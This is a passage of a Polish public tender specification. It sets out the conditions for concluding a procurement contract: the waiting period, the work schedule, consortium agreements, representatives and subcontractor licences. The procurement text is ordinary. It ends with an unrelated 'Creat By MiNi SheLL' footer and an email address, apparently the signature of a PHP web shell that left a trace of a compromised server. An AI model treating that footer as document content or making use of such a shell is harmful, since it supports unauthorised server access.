PUBLICZNEGO<br/>1. Zamawiający zawrze umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2.	Wykonawca przed podpisaniem umowy przedłoży do akceptacji Harmonogram realizacji przedmiotu zamówienia. Przy ustalaniu harmonogramu prac należy uwzględnić fakt, że obiekt jest obiektem czynnym pracującym w trybie ciągłym. Należy ustalić z Zamawiającym sposób prowadzenia prac montażowych tak, aby w jak najmniejszym stopniu dezorganizować prace w obiekcie.<br/>3. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt. 1, jeżeli w postępowaniu zostanie złożona tylko jedną ofertę.<br/>4.	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający zastrzega sobie dodatkowo prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>5.	Przed podpisaniem umowy wybrany wykonawca przekaże Zamawiającemu informacje niezbędne do wpisania w treści umowy (np. imiona i nazwiska upoważnionych osób, które będą reprezentować wykonawcę przy podpisaniu umowy), wraz z przekazaniem niezbędnych pełnomocnictw, o ile będą konieczne.<br/>6.	W przypadku realizacji zamówienia z udziałem podwykonawców którym zostanie zlecony zakres prac do których wymagana jest koncesja, Wykonawca przed podpisaniem umowy zobowiązany jest do przedłożenia kopii koncesji tych podwykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com